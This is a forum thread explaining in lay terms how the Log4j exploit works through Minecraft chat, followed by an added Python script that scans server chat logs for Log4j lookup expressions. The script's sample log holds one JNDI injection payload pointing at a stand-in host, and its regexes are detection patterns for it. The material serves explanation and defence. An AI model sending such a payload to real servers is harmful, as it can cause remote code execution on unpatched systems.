3
Can anyone explain to me, in simple terms, what is going on with the Java exploit?
Since I am not a programmer, I don't understand the language. Can anyone please explain in simple terms what is going on?
4
[deleted]
As Coffee stated, it allows hackers to remotely execute code (e.g. get your IP addresses and download stuff) by sending a string with a certain pattern into chat which gets logged internally (which is what Minecraft always does with chat and commands), but also remotely executes that malicious code to grab your details/install ransomware.
Procedure of the hack:
- Data from the hacker gets sent to the server via chat message to the server
- The server logs the message sent by the hacker, containing the malicious payload
- The (log4j) vulnerability is triggered by this payload and the server makes a request to the main server/Java files of the server via the internally imported software responsible for receiving and displaying chat messages and commands
- The text pattern contains a path to a remote server/java file which is injected and allows an attacker to execute their code remotely.
Btw, this affects all applications that use that logging software, not just Minecraft. A whole bunch of enterprise programs were vulnerable to this too, such as Steam and the Apple iCloud.
https://www.lunasec.io/docs/blog/log4j-zero-day/
Basically you can execute whatever pieces of code (malicious or whatever code) just by typing in chat and without permission of the user!
omg
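For server admins, the "chat message gets logged" step in the procedure above is also where the attempt can be spotted. This is an added example, not code from the thread or from Log4j: it scans chat lines for Log4j lookup expressions, and the log line format, player names and sample lines are assumptions constructed for illustration.

```python
import re

# Minecraft-style server log line (format assumed for this example):
#   [12:00:01] [Server thread/INFO]: <PlayerName> chat message
CHAT_LINE = re.compile(
    r"^\[(?P<time>[\d:]+)\] \[[^\]]*\]: <(?P<player>[^>]+)> (?P<msg>.*)$"
)
LOOKUP = re.compile(r"\$\{")                 # start of a Log4j lookup expression
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)  # lookup that contacts a remote server


def classify(message):
    """Return 'high', 'suspicious' or None for one chat message."""
    if JNDI.search(message):
        return "high"
    # Lookups can be nested, so the word "jndi" may not appear literally;
    # any lookup expression arriving through chat deserves a closer look.
    if LOOKUP.search(message):
        return "suspicious"
    return None


def scan(lines):
    """Return a list of (time, player, severity) for every flagged chat line."""
    findings = []
    for line in lines:
        m = CHAT_LINE.match(line.rstrip("\n"))
        if not m:
            continue  # not a chat line (joins, server messages, stack traces)
        severity = classify(m.group("msg"))
        if severity:
            findings.append((m.group("time"), m.group("player"), severity))
    return findings


# Constructed sample log, not from a real server.
# example.invalid is a reserved host name that never resolves.
SAMPLE_LOG = [
    "[12:00:01] [Server thread/INFO]: <Alex> anyone want to trade?",
    "[12:00:07] [Server thread/INFO]: <Steve> ${jndi:ldap://example.invalid/a}",
    "[12:00:09] [Server thread/INFO]: Steve left the game",
    "[12:00:15] [Server thread/INFO]: <Guest42> ${date:yyyy} hello",
    "[12:00:20] [Server thread/INFO]: <Alex> that costs $5 {lol}",
]

if __name__ == "__main__":
    for time, player, severity in scan(SAMPLE_LOG):
        print(f"{time} {player}: {severity}")
```

A hit only means someone sent the pattern; whether the server acted on it depends on whether its Log4j version was still vulnerable at that time.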